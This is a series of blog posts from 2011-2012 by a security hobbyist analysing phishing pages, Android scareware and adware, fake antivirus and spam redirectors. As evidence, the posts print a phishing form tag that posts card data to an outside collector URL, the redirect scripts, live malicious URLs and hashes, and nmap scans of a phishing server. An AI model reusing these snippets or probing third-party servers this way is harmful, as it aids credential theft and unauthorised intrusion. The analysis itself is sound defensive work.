Overblog
Suivre ce blog Administration + Créer mon blog
5 juin 2012 2 05 /06 /juin /2012 17:12

 

 

Capture_paypal_050612.PNG

 

The malicious code is: <form method="post" id="ccForm" action="http://mix4.top8.com/lol/coco-stor.php" name="ccForm" class="" onsubmit="return verif_formulaire()"> 

 

Not detected by most browsers: Opera, IE,....

Partager cet article

Repost0
4 avril 2012 3 04 /04 /avril /2012 00:07

 

The mobile malware (are we gonna call it mobalware someday?) fashion seems to copy the regular malware one... maybe somewhat a little bit faster.

 

Anyway, I was keen on an app aiming to improve standard Android  SMS reader/writer. The app is called ChompSMS. There is a free version, and a paid version. I'm going to talk here about the free one.

 

One day, recently, I noticed the add being displayed while browsing the SMS had changed.

 

 Here are a few examples of the banners I find interesting:

 

batt_-banner1_chompSMS_annon.png

 

batt_banner2_ChomSMS_annon.png

 

 

batt_banner3_chompSMS_annon.png

 

 

See the banner right in the bottom of the screen?

So, if I click on it, the real part begins.

 

batt2.png

 

 

Obviously, I will not have the choice here... only the orange button ("next"). This is what I'm here for: let's click on it!

 

 

 batt_alert2_040412.png

 

The displayed instructions are worth reading :)  everything is done to convince the user to download, install, and activate whatever is gonna be downloaded... and by the way, they also recommend to enable "unknown sources" of software...!

 

What about the antivirus? well, not bad on that one.

Webroot will indeed detect and alert:

webroot_alert1_040412.png 

And DrWeb will do the same:

 

drweb_alert1_040412.png 

Note that even the file name is thoroughly defined: "battery_upgrade--tap_to_start", even with a reminder : "tap to start"!

 

Now, where does this come from?

Let's watch the network traffic that ChompSMS generates just after having opened/launched:

HTTP_trafic_CHompSMS_Ads_040412.png 

 Bingo, here is the real and complete ad URL:

http://www.mmnetwork.mobi/s.php?sig=5942e84d7db11dc54eda6157a3c2bc7a&adid=480&banner=320_50&cid=89&advid=846&e=c8&d=92888&f=m&ua=Mozilla%2F5.0+%28Linux%3B+U%3B+Android+2.3.3%3B+fr-fr%3B+GT-I9100+Build%2FGINGERBREAD%29+AppleWebKit%2F533.1+%28KHTML%2C+like+Gecko%29+Version%2F4.0+Mobile+Safari%2F533.1

It will return the exact banner we have seen at the bottom of the ChompSMS screen just above.

But having a look at the URL reveals something else:

- OS version, generic:  value here is "linux" 

- OS version, detailed: Android 2.3.3

- local language: fr-fr

- build version: Gingerbread

- browser rendering engine: AppleWebkit, 533.1?

- browser compatibility: KHTML like Gecko version 4.0

- browser internal name: Mobile Safari,  533.1?

All I can say so far, except that this is a real fingerprint of the device, is this will allow the ad (and the scareware) to target devices configurations, and be more efficient.

Same thing for this other URL:

http://ads.mojiva.com/ad?site=14717&ua=Mozilla%2F5.0+%28Linux%3B+U%3B+Android+2.3.3%3B+fr-fr%3B+GT-I9100+Build%2FGINGERBREAD%29+AppleWebKit%2F533.1+%28KHTML%2C+like+Gecko%29+Version%2F4.0+Mobile+Safari%2F533.1&ip=82.237.173.18&count=1&key=1&zone=19352&url=&premium=1&over_18=0&&udid=848053C87A05BDEB3EE36C8919CD4CD1&type=6  

 

Then when we click the ad system will display a first picture, as an ad:

http://admarvel.s3.amazonaws.com/ads/c46767/13307072869253_UNL_st2_480x600_FR_everything.gif

13307072869253_UNL_st2_480x600_FR_everything.gif 

 

And even a second one!

http://admarvel.s3.amazonaws.com/ads/c48174/13317172538745_LYRICPLAY_FR_480X600.gif

13317172538745_LYRICPLAY_FR_480X600.gif
 

Then the ad system will do something I guess to be a "call home":

http://107.22.117.140/fam/ck.php?p=__pid=ef8a30b841b36346__sid=14488__bid=352249__cb=0654201044__h=1333491475__uid=292b5557482687e4__s=7789be62e6c35a07fe085f54d7d9fe26

http://107.22.117.140/fam/view.php?p=__pid=ef8a30b841b36346__sid=14488__bid=352249__cb=c32f363568__h=1333491475__uid=292b5557482687e4__s=782405e716ee038035c5457a2cb05672

 

http://adserver.adtechus.com/addyn/3.0/5326.1/2335977/0/0/ADTECH;noperf=1;loc=100;ip=82.237.173.18;key=Samsung_Galaxy+S2;kvip=82.237.173.18;kvcarrier=;misc=1333492265028;target=_self;kvmedition=$edition;kvos=Android;sub1=99f50d6b93f7d3f36b56c4d082a57a135d92caf8;sub2=8ADD4216FF9A40854591929EB3BC02CC081EA2FE;sub3=6568cf499469dbc79707fba422cfd36f;sub4=848053C87A05BDEB3EE36C8919CD4CD1;
 

I can even see here the mobile IP address, and the model (Galaxy S2! 


Last, but not least, the download will start:

Url: https://s3.amazonaws.com/battery.supercharge/downloads/m--france--2012-03-28.a-en-9.apk?AWSAccessKeyId=AKIAIADYPOKA37DVGHGQ&Expires=1649026622&response-content-disposition=attachment;%20filename=Battery_Upgrade--Tap_to_Start.apk&response-content-type=application/vnd.android.package-archive&Signature=TZCWnCk5wbn%2BeoL1WCkcqfky3pw%3D FileName: /mnt/sdcard/.downloadTemp/Battery_Upgrade--Tap_to_Start.apk  

 

About the file?

VirusTotal says 7 AV our of 42 detect it...

SHA1: afdf9c78e0e1bc41192664ba3040908c18d72a3a
MD5: 1e67b070accd8d71024f240504b59140
File size: 529.3 KB ( 541956 bytes )
File name: Battery_Upgrade--Tap_to_Start.apk
File type: Android
Detection ratio: 7 / 42
Analysis date: 2012-04-03 23:28:47 UTC ( 3 minutes ago )

 

https://www.virustotal.com/file/6e129566f5139532c18779ae96c4f228a15d27032081d46f486ae029c4d6dce7/analysis/1333495727/

 

 More to come... 

Partager cet article

Repost0
11 janvier 2012 3 11 /01 /janvier /2012 01:12

I would believe we are back to Win 9x systems fashion, when adwares used to be legion (at least, in proportion compared to global threats trends at this time). But this case seems to concern any Android OS from 1.6 to 2.x, much more modern systems...

In a nutshell, this adware will:

- add an icon on the main screen of your phone, leading to a kindda "fake" Google search engine

- display adds within the top taskbar, suggesting you to download, or pay I should say, new apps, on a regular basis; therefore accessing the network through 3G connectivity

- remain active as a background service... 

 

But what are we really talking about? This is all about a game: Helicopter Strike Force. See splashscreen of the game, while loading:

adware-heli-2012-01-11-005724-copie-1.png

 

Most of the installed AV I've tested do not detect it: 

- Norton (no screenshot available at the time of the test... :( )

- DrWeb 

drweb_device-2012-01-11-005326.png

- Weebroot

webroot_device-2012-01-11-005205.png

- Kaspersky Lite 

KAV-OK-2012-01-11-011915.png

Note that KAV uses the "Kaspersky Security Network", to scan in the cloud the app before its first execution. Although I have installed (and uninstalled) the game twice, with several days between each install, the KSN did not find anything.

 

I even tried VirusTotal, but no real result. I'm wondering if the command line versions of AV engines that VT uses are able to use mobile-specific threat signatures.

 

But that's not all, this app will also install a service, that could be surprising for "just" a game...

app-service-2012-01-11-011009.png

 

 

Now here is the new icon on the main/first desktop:

accueil_device-2012-01-11-005348-copie-1.png

 

But the thing is, this search engine is not what you may think. When you launch it, it will get access to livemobilesearch.com... which in turns does look like Google, but it's not!

Charge-recherch-2012-01-11-005628.png

Then:

recherch1-2012-01-11-005408.png

(bottom of page)

recherch2-2012-01-11-005420.png

 

You have to go read the "privacy" link, down the page, to confirm our expectations:

recherch-privacy-2012-01-11-005453.png

 

Last, but not least, the results this search engine provides do differ from the Google's ones. For instance, the keyword "music" will return:

result-music-2012-01-11-011631.png

 

While the "real" Google says:

google_music_110112.PNG

 

Therefore I'd say that:

- yes, antimalware on some smartphones is more and more needed. I suggest everybody tries one...

- as we have been saying for years on regular computers, be careful regarding the links you click and the apps you download... 

 

 

Update 1, 01/15/12:

Let's see what's going on deeper within Android:

DebugMon_app-process-service_14012012-copie-1.png

 

It appears that "helicopterstrikeforce" launches 3 processes/services. One of them seems to have an interesting name: noolah.pushnotification. 

Searching Google for it returns the following PDF document:

https://docs.google.com/viewer?a=v&q=cache:JD8QLTJaokAJ:forum.unity3d.com/attachment.php%3Fattachmentid%3D22799%26d%3D1311396784+&hl=fr&pid=bl&srcid=ADGEESjCxeNBKAr8al8ucNN9aYNB4e14wcIVSyGps1m98N4V28LCbBDok2MP00DAuK67r-VGip0kMbnUuwTYdYn62PuEsyqCnLJqbpv-kaoOZymAxhzFJ1NVYqIFeQ-TNyrJYCT_A5np&sig=AHIEtbR8kCBOiQlmRSpvniyC5MzAMoFo7w

 

Pretty interesting too, as it explains the ad's implementation:

moolah1_15012012.png

moolah2_15012012.png

There we go: service androidname="com.moolah.NotificationService"!

 

Therefore, this will act as the adware component, and will remain active even if the game is not being run.

Let's see the result:

 

apps-notification-full-2012-01-14-134438.png

 

"Android app offer", and "Live & work in the USA" are not related to the phone's own processes (or user's actions/RQ).

Here is an example of such advertised apps: once the user has clicked on it, he will be redirected to a website like:

app1-2012-01-11-005544.png

 

Fortunately, this phone was using WiFi connectivity ATOW, but obviously wireless does not work while roaming (I mean, walking in the street, for instance), thus this ad will create extra (and most likely uncontrolled) data transfer over 3G!

 

If the mobile network operator does charge data in anyway, those apps may become painful for people's CC. So pay attention whenever an app requires full Internet connexion at install, while it is not necessary according to its type!

Partager cet article

Repost0
6 décembre 2011 2 06 /12 /décembre /2011 21:55

 

 

First I thouht this was like regular spam, and something close to Viagra (and others...). But, in the end, no...

The contact told me his "mail account" had been stolen, whereas I do believe his computer has been compromised (and then, the bad guys used that to gain access to the email account...).

msg_Gmail.JPG

 

But when I clicked on it, surprise... The real URL is:

http://bessthoprapi2iad .vv.cc/2i3xuqg42.jsp.

But this will in fact redirect the user to:

http://87.255.77. 35/fw2.pl

 

Then new redirection: http://dsdss333 .coom.in/dng311011/a90c83a2e63449deddcf99e0660d9f73/spl.php (detected by KAV 2011, but apparently this is not efficient enough to block the infection).

 

Under IE9, here is what happens:

 msg1_IE9_egorest.co.in.jpg

 

 

If I click on Yes, it goes:

scan1_IE9_egorest.co.in.jpg

 

Then...

 

scan2_IE9_egorest.co.in.jpg

 

Quite regular now, since even if I click "Cancel", a file will attempt to be downloaded, still in a regular way:

 

file_egorest.co.in.JPG

 

 

 IE 9 tries then to warn me the file "is not being downloaded so often, and could be harmfull"...:

 

msg_file_IE9_egorest.co.in-copie-1.JPG

 

 

 

 KAV 2011 does not detect the sample. Neither does MalwareByte.

 

VirusTotal's results are quite clear! only 2 engines out of 41...!

 

Result
AhnLab-V3 2011.12.06.01 2011.12.06 -
AntiVir 7.11.19.2 2011.12.06 -
Antiy-AVL 2.0.3.7 2011.12.06 -
Avast 6.0.1289.0 2011.12.06 -
AVG 10.0.0.1190 2011.12.06 -
BitDefender 7.2 2011.12.06 -
ByteHero 1.0.0.1 2011.11.29 -
CAT-QuickHeal 12.00 2011.12.06 -
ClamAV 0.97.3.0 2011.12.06 -
Commtouch 5.3.2.6 2011.12.06 -
Comodo 10859 2011.12.06 -
DrWeb 5.0.2.03300 2011.12.06 -
Emsisoft 5.1.0.11 2011.12.06 -
eSafe 7.0.17.0 2011.12.06 -
eTrust-Vet 37.0.9607 2011.12.06 -
F-Prot 4.6.5.141 2011.11.29 -
F-Secure 9.0.16440.0 2011.12.06 -
Fortinet 4.3.388.0 2011.12.06  W32/Kryptik.TAF!tr
GData 22 2011.12.06 -
Ikarus T3.1.1.109.0 2011.12.06 -
Jiangmin 13.0.900 2011.12.06 -
K7AntiVirus 9.119.5608 2011.12.06 -
Kaspersky 9.0.0.837 2011.12.06 -
McAfee 5.400.0.1158 2011.12.06 -
McAfee-GW-Edition 2010.1D 2011.12.06 -
Microsoft 1.7903 2011.12.06 -
NOD32 6681 2011.12.04 -
Norman 6.07.13 2011.12.06  W32/Kazy.NA
nProtect 2011-12-06.01 2011.12.06 -
Panda 10.0.3.5 2011.12.06 -
PCTools 8.0.0.5 2011.12.06 -
Prevx 3.0 2011.12.06 -
Rising 23.87.01.02 2011.12.06 -
Sophos 4.71.0 2011.12.06 -
SUPERAntiSpyware 4.40.0.1006 2011.12.06 -
Symantec 20111.2.0.82 2011.12.06 -
TheHacker 6.7.0.1.352 2011.12.01 -
TrendMicro 9.500.0.1008 2011.12.06 -
TrendMicro-HouseCall 9.500.0.1008 2011.12.06 -
VBA32 3.12.16.4 2011.12.06 -
VIPRE 11212 2011.12.06 -
ViRobot 2011.12.6.4811 2011.12.06 -
VirusBuster 14.1.102.0 2011.12.06 -
MD5: c7fa7ebcb697b26ac684f8b18a0f30b4
SHA1: 98561e513580021bbd2f715e54a53e96558a8a1f
SHA256: bc9264cd51df7815a96c0753cbacbde9f2f491a191b78a06782854abb93171f4
File size: 129536 bytes
Scan date: 2011-12-06 21:48:09 (UTC)

 

 About the file:

 I also find interesting to mention that the exefile is in fact made of pure MS technology: Silverlight.

 

 

file_properties.jpg

 

Update 1:

Being run on a fully-patched Win 7 x64, nothing really bad happens... it seems that an additional download fails.

This is also what ThreatExpert tels about the file execution history:

http://www.threatexpert.com/report.aspx?md5=c7fa7ebcb697b26ac684f8b18a0f30b4 

Buggy malware?

 

Partager cet article

Repost0
9 novembre 2011 3 09 /11 /novembre /2011 01:32

 

This malware did succeed to install itself on the following configuration:

- Win7 64 bits, fully-patched

- KAV 2011

- user account not administrator (account switch using UAC)

- Opera 11.52 up-to-date

I was just surfing... Therefore I do believe it is a kindda drive-by-download.

 

Once installed, it will:

- kill all programs running (yes!), including a lot of services (sometimes KAV's service too)

- prevent you from launching new/other programs

- display a fake shield within the taskbar...

 

 Here is how it starts itself at the beginning of the user's session:  

registre_HKU_privacy.exe.jpg

 The Sysinternals tool "autoruns" does not show it, AFAIK.

 

According to VirusTotal, only 3 AV engines out of 43 (command line versions) do detect it !

(link: http://www.virustotal.com/file-scan/report.html?id=c6d83ab1348c548b7581153100b8b7eb7c1b89b3e753151594828c2ac78f2c12-1320798644# )

 

Kaspersky Antivirus 2011 does not detect anything. 

MalwareByte does detect something, but the problem is you can't start it once the malware is being run...

 

MBAM_privacy.exe_091111.png

 

 

As you can see, the malware stores a file in %appdata%, so that's the Appdata\roaming for the current user.

 

One hour after my first scan, VT says 3 new engines detect it:

Antivirus Version Last Update Result
AhnLab-V3 2011.11.08.01 2011.11.08 -
AntiVir 7.11.17.87 2011.11.08 -
Antiy-AVL 2.0.3.7 2011.11.08 -
Avast 6.0.1289.0 2011.11.08 -
AVG 10.0.0.1190 2011.11.08 -
BitDefender 7.2 2011.11.09 -
ByteHero 1.0.0.1 2011.11.04 -
CAT-QuickHeal 11.00 2011.11.08 -
ClamAV 0.97.3.0 2011.11.08 -
Commtouch 5.3.2.6 2011.11.08 -
Comodo 10714 2011.11.08 -
DrWeb 5.0.2.03300 2011.11.09 -
Emsisoft 5.1.0.11 2011.11.09 Trojan.Win32.Agent.AMN!A2
eSafe 7.0.17.0 2011.11.08 -
eTrust-Vet 36.1.8663 2011.11.08 -
F-Prot 4.6.5.141 2011.11.08 -
F-Secure 9.0.16440.0 2011.11.09 -
Fortinet 4.3.370.0 2011.11.08 -
GData 22 2011.11.09 -
Ikarus T3.1.1.109.0 2011.11.08 -
Jiangmin 13.0.900 2011.11.08 -
K7AntiVirus 9.117.5413 2011.11.08 -
Kaspersky 9.0.0.837 2011.11.09 -
McAfee 5.400.0.1158 2011.11.09 Artemis!61E2511F79EF
McAfee-GW-Edition 2010.1D 2011.11.08 Artemis!61E2511F79EF
Microsoft 1.7801 2011.11.08 -
NOD32 6612 2011.11.08 a variant of Win32/Kryptik.SES
Norman 6.07.13 2011.11.08 W32/Krypt.BD
nProtect 2011-11-08.01 2011.11.08 -
Panda 10.0.3.5 2011.11.08 -
PCTools 8.0.0.5 2011.11.09 -
Prevx 3.0 2011.11.09 -
Rising 23.83.01.01 2011.11.08 -
Sophos 4.71.0 2011.11.09 Mal/FakeAV-PG
SUPERAntiSpyware 4.40.0.1006 2011.11.09 -
Symantec 20111.2.0.82 2011.11.09 -
TheHacker 6.7.0.1.339 2011.11.08 -
TrendMicro 9.500.0.1008 2011.11.08 -
TrendMicro-HouseCall 9.500.0.1008 2011.11.09 -
VBA32 3.12.16.4 2011.11.08 -
VIPRE 11001 2011.11.09 -
ViRobot 2011.11.8.4761 2011.11.08 -
VirusBuster 14.1.53.1 2011.11.08 -
Additional information
Show all
MD5 : 61e2511f79ef738d73d766c0ab8c8c1a

 

Most of these detections are heuristic/generic ones!

I've submitted a sample to ClamAV.

 

About the file:

fichier_proprietes_091111.jpg 

There even is a Copyright for it...  

 

Partager cet article

Repost0
1 novembre 2011 2 01 /11 /novembre /2011 21:27

I just found out that one of my NIPS' reports seems pretty clear regarding the daily top alerts:

alert_NIPS_65.98.36.50.JPG

 

For those who forgot to secure a lil bit their (open)SSH server, time's running...

What about that IP address 65.98.36.50? Well, it is the reverse DNS pointer of http://argi9cure.com/.

Just have a look at it: CentOS default webpage! :( And above all, Apache 2.2.3, most likely obsolete.

 

Quite interesting, what (McAfee) TrustedSource says about it:

 

trustedsource.org_65.98.36.50.JPG

 

So, not only massive SSH sessions attempts are being launched from that server, but its mail volume (as a sender) has drastically changed, and got 500% bigger!

Another compromised server being used to stealthily spam, uh?

Furthermore, this IP address has also been reported in the DShield's stats: 

http://www.dshield.org/ipinfo.html?ip=65.98.36.50&update=yes

This once again shows the relevance of IP's reputation based filtering.

 

Partager cet article

Repost0
30 octobre 2011 7 30 /10 /octobre /2011 22:52

En navigant sur le web, j'ai eu la surprise de voir KAV 2011 alerter lors de l'accès à un site (trojanedbinaries.com). Voici le message complet :

alerte_trojanedbinaries.com_rss_301011.JPG

Analysons donc le sens du message, via le nom de la détection :

- HEUR pour Heuristique, certainement. 

- Exploit, comme son nom l'indique ?

- Script.Generic, pour une détection de script ?

 

J'ai bien peur que KAV fasse erreur : une soumission de l'URL à VT donne des résultats plutôt rassurants 

http://www.virustotal.com/url-scan/report.html?id=b222631fa7d0b88d67c630272c3c9690-1320007826

URL Analysis tool Result
Avira Clean site
BitDefender Clean site
Dr.Web Error
G-Data Clean site
Malc0de Database Clean site
MalwareDomainList Clean site
Opera Clean site
ParetoLogic Clean site
Phishtank Clean site
TrendMicro Unrated site
Websense ThreatSeeker Unrated site
Wepawet Unrated site
Normalized URL: http://trojanedbinaries.com/blog/?feed=rss2//trojanedbinaries
URL MD5: b222631fa7d0b88d67c630272c3c9690

 

Bref, si simplement le nom du fichier suffit à KAV pour le bloquer, le risque faux-positif me semble réel.

Solution : ne pas "supprimer" directement les objets détectés, mais toujours les mettre en quarantaine pour inspection à posteriori !

Partager cet article

Repost0
14 octobre 2011 5 14 /10 /octobre /2011 01:15

 

L'échantillon parle de lui-même :

 

email.JPG

 

L'utilisation d'un compte GMail, comme point de contact pour une promo "Orange", semble loufoque. Au pire, un Wanadoo aurait déjà pu semer le trouble pour les "nouveaux internautes"...

 

Et le comble, c'est que le message est émis depuis la (fausse) adresse : contact@free.fr ! Là, on mélange carrément tout !

 

Inutile de dire que je ne recommande ni de leur écrire, ni de leur envoyer un SMS...

 

---------------------------------------------------------------------------

Concernant le numéro de téléphone 81168, il est présent sur d'autres sites, pas forcément très clairs/recommandables, comme :

http://www.hacker-msn.org/hacker-msn/ 

http://www.hack-paradize.net/products/sms.aspx

http://hacker-dofus.net/generer-des-kamas.html

toujours avec le même mot-clef "STAR"... 

 

----------------------------------------------------------------------------

Concernant le serveur émetteur du courriel : 91.122.206.1, il est signalé par 21 listes noires Internet au 14/10 !

Cf : http://ip-blacklist.e-dns.org/91.122.206.1

 Warning! This IP is listed in 21 DNS blacklists.

LISTED 30ms 510 Software Group Blackholes
LISTED 31ms APEWS Level 2
LISTED 30ms Barracuda Reputation Block List
LISTED 30ms Barracuda Reputation Block List (for SpamAssassin)
LISTED 30ms CBL
LISTED 94ms D. D. N. S. B. L.
LISTED 38ms nsZones.com Dyn
LISTED 38ms nsZones.com SBL+Dyn
LISTED 134ms no-more-funn
LISTED 30ms SORBS Aggregate zone (problems)
LISTED 30ms SORBS Spamhost (any time)
LISTED 30ms SORBS Spamhost (last year)
LISTED 70ms SpamCop Blocking List
LISTED 30ms SpamRATS! all
LISTED 57ms Spamhaus ZEN Combined Block List
LISTED 76ms SpamRATS! Dyna
LISTED 106ms Spamhaus XBL Exploits Block List
LISTED 151ms Spamhaus SBL-XBL Combined Block List
LISTED 30ms GBUdb Truncate
LISTED 30ms UCEPROTECT Level 2
LISTED 30ms UCEPROTECT Level 3

Partager cet article

Repost0
17 septembre 2011 6 17 /09 /septembre /2011 00:23
To those who believe russian web tends to be safer, please first read Kaspersky's threat report Q2 2011.

Then, have a look at the following.
 
Here is the mail I received (14th of September):
mail_gyuntere.ru_170911.jpg
The contact who sent this email is most likely to have a compromised computer.
 
The URL to be spread is:
It is not even hidden (like displaying a different URL between source code and HTML rendered).
 
As you can see, it is a Wordpress powered websit (the "wp-content" part within the URL).
 
But the funny thing is the message being displayed on this webpage:
 
You are here because one of your friends have invited you
to try our free trial.
Hurry up! Limited quantity available!
We try to be helpful for you.
Page loading, please wait....
 
 
Then there is an automatic redirection in the source code. The most simple way:
meta http-equiv="refresh" content="4; url=http://gyuntere.ru"
 
 
Now, what Netcraft says about this website?
netcraft_url_170911.jpg
Hosted in Romania, while the ccTLD is Russia (.ru).

And last, the "real" webpage, which content is likely to be related to "male enhancement"... hum.
 
site_170911.jpg
 
Netcraft's riskrating bar is red, but no warning while accessing the website.
And yes, Nginx is also being used to render "spam related" websites...

============================
Update 1:

More about the "bouncing" server:
It seems that the whole folder 
http:///www.margotta.info/wp-content/uploads/developer_tools/EnableCustomHeaderThemeOption/
has been compromised, since there are a lot of files with kindda random names, and most of them contain a message like:
"You are here because one of your friends have invited you."

bounce_srv_files_170911.jpg

But what I find the most interesting is that almost each of those files seems to contain a different redirection URL!

A few examples:
- http:///www.margotta.info/wp-content/uploads/developer_tools/EnableCustomHeaderThemeOption/1111.htm
- > http:///caretabgalaxy.com/

- http:///www.margotta.info/wp-content/uploads/developer_tools/EnableCustomHeaderThemeOption/domvkf.htm
-> http:///wikimedicare.com/

- http:///www.margotta.info/wp-content/uploads/developer_tools/EnableCustomHeaderThemeOption/dttnba.htm
- > http:///gyuntere.ru/

- http:///www.margotta.info/wp-content/uploads/developer_tools/EnableCustomHeaderThemeOption/mmarfd.htm
- >  http:///ommatorepillstablets.net/ 

And BTW, the same scenario seems to happen to another website:
http:///dev.studiolumierefilms.com/wp-content/plugins/extended-comment-options/        

Thus we have: 
- http:///dev.studiolumierefilms.com/wp-content/plugins/extended-comment-options/crsrtfh.htm  
- >  http:///carepillhealth.com/

- http:///dev.studiolumierefilms.com/wp-content/plugins/extended-comment-options/1111.htm
- > http:///caretabgalaxy.com/

- http:///dev.studiolumierefilms.com/wp-content/plugins/extended-comment-options/aaa.htm
- > http:///counterpunchdietmeds.com/

It looks like a real global spam campaign, taking advantage of compromised websites running Wordpress, to lure antispam/URL filters and spread over the Internet...

Partager cet article

Repost0
19 août 2011 5 19 /08 /août /2011 22:05

 

Cette fois-ci, j'ai préféré ne pas évaluer l'efficience de solutions de sécurité à l'instant T où la menace atteignait le poste, mais quelques temps après...

 

Voici le courriel, assez bien fait d'ailleurs :

email_maghegy.com_130811-copie-1.JPG

 

 Thunderbird 64 (Miramar) avait alerté sur un risque de "scam" pour ce courriel.

Mais que donnent les protections pour l'utilisateur, niveau navigateur, 6 jours donc après avoir reçu le courriel ?

 

- Internet Explorer 9 : OK, avertissement

- Opéra 11.50 : OK, avertissement

- Netcraft : OK, avertissement

 

- Firefox 5 : aucune alerte

- Safari 5 : aucune alerte

- Chrome 13 : aucune alerte

- WOT : aucune alerte

- Webutation : aucune alerte...

 

Pour Safari :

site_Safari_OK.jpg

 

Pour Chrome :

site_Chrome_OK.jpg

 

Et le plus intéressant, FIrefox 64 bits 4.0b12pre (avec WOT, Webutation, Netcraft...)

site_FF64_OK.jpg

 

 

Webutation, encore plus explicite ("tout va bien") :

site_webuptation_OK.JPG

 

 Heureusement, Netcraft réagit :

site_netcraft_alert.pg-copie-1.jpg

 

------------------------------------------------------------------

Et maintenant, si je tente de faire marcher la duperie jusqu'au bout ?

Remplissons le formulaire, adresse email et mot de passe, et validons...

Firebug indique clairement où part le mot de passe :

login_Firebug.jpg

 

La page qui suit l'envoi frauduleux des identifiants utilisateur, est assez intéressante !

site-page2_FF64_OK.jpg

 

Serait-ce lié à la campagne actuelle de fraude à la fausse facture ?

 

Au niveau réseau, le traffic est lui-aussi assez révélateur :

site-page2_firebug.jpg

   Diverses requêtes vers maghegy.com n'aboutissnet pas... pourtant le kit de hameçonnage semble marcher globalement.  

Il est notable que l'image avec tous les logso bancaires (certainement pour rassurer l'utilisateur, comme de "faux partenariats" : http://nsa25.casimages.com/img/2011/04/09//110409011725248635.jpg :

http://nsa25.casimages.com/img/2011/04/09//110409011725248635.jpg

Le serveur hébergeant cette image est chez OVH...

D'autres éléments (notamment images) sont récupérées ailleurs que chez Orange.fr... exemple pour le bonhomme orange :  http://img.woopic.com/common/g8/img/new_user_welcome.gif  

 

Jouons le jeu jusqu'au bout... je remplis donc le formulaire. Etrange, il m'est demandé à la fois mon numéro de carte ET mon numéro de compte !

On notera que le formulaire est tellement bien fait que je ne peux lui rentrer des numéros complètement fantaisistes :

site-page2_remplissage-detect.jpg

 

 En fait, c'est le vérificateur de Luhn qui est appliqué... (cf. http://www.thetaoofmakingmoney.com/2007/04/12/324.html)

Donc pour leurer le contrôle, je prends l'exemple 4552 7204 1234 5677.

Finalement, quand le formulaire est accepté, un clic sur "Valider" envoie une requête POST toujours vers le même domaine :

site-page2_POST.jpg

 Les données du formulaire sont bien visibles, et c'est la page "xeon.php" qui récupère le tout.

 

De manière assez classique, mais déjà éprouvée, cette requête POST est suivie d'une redirection vers le VRAI site  Orange (id.orange.fr). 

 

Et enfin, si l'on tente d'accéder à la racine de l'environnement de hameçonnage, la réponse HTML du serveur est étudiée pour renvoyer une vraie-fausse page Webmail Orange :

 <html> <script type="text/javascript"> echo = "logins2.html?-http/webmail1e.orange.fr/webmail/fr_FR/inbox.html?w=0&FromSubmit\
=true?rpsnv=11
&ct=1258553363&rver=6.0.5285.0&wp=MBI&wreply=http:%2F" self.location.replace(echo); window.location = echo; </script> </html>

 

------------------------------------------------------------------------------------------------------

Et à propos du serveur, me direz-vous ? 

Un vieux réflexe m'amène à tenter un nmap -O --osscan-guess. Le résultat est plutôt intriguant :

 

Starting Nmap 5.51 ( http://nmap.org ) at 2011-08-20 00:01 Paris, Madrid (heure dÆÚtÚ)
Nmap scan report for maghegy.com (46.252.201.1)
Host is up (0.040s latency).
rDNS record for 46.252.201.1: n1nlhg286c1286.shr.prod.ams1.secureserver.net
Not shown: 986 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
443/tcp open https
50000/tcp closed ibm-db2
50001/tcp closed unknown
50002/tcp closed iiimsf
50003/tcp closed unknown
50006/tcp closed unknown
50300/tcp closed unknown
50389/tcp closed unknown
50500/tcp closed unknown
50636/tcp closed unknown
50800/tcp closed unknown
Device type: general purpose|WAP|firewall|phone|printer
Running (JUST GUESSING): OpenBSD 4.X (95%), Linux 2.6.X|2.4.X (91%), Linksys Linux 2.4.X (91%), HID embedded (90%), Nokia Linux 2.6.X (89%), Netgear embedded (88%), Asus Linux 2.6.X (87%), Epson embedded (87%)
Aggressive OS guesses: OpenBSD 4.3 (95%), Linux 2.6.18-8.el5 (Red Hat Enterprise  Linux 5) (91%), Linux 2.6.20 (91%), Linux 2.6.20 (Ubuntu, x86_64) (91%), Linux 2.6.22 (91%), Linux 2.6.22 (Ubuntu, x86) (91%), OpenWrt White Russian 0.9 (Linux  2.4.30) (91%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (91%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (91%), HID EdgePlus Solo ES400 firewall (90%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.80 seconds

 

BSD, linux, point d'accès WiFI ?... le tout hébergé sur un prod.ams1.secureserver.net ? késako... (WTH? ;) certains comprendront).

Et toujours lancé sur Nmap, la détection de services me fait hausser les sourcils : 

PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 5.1 (protocol 2.0)
80/tcp open http Apache httpd
443/tcp open http Apache httpd

OpenSSH 5.1 ? même sur des machines dites sécurisées, je ne le croise presque jamais...!

 

Du coup, je vais tenter une identification par signature : HTTPrecon.

serveur_empreinte_HTTP.jpg

 Bingo, Apache 2.2.8 ! 

J'ai vu pire, mais c'est déjà une première porte d'entrée suceptible d'avoir compromis le serveur. Nessus tourne... 

Partager cet article

Repost0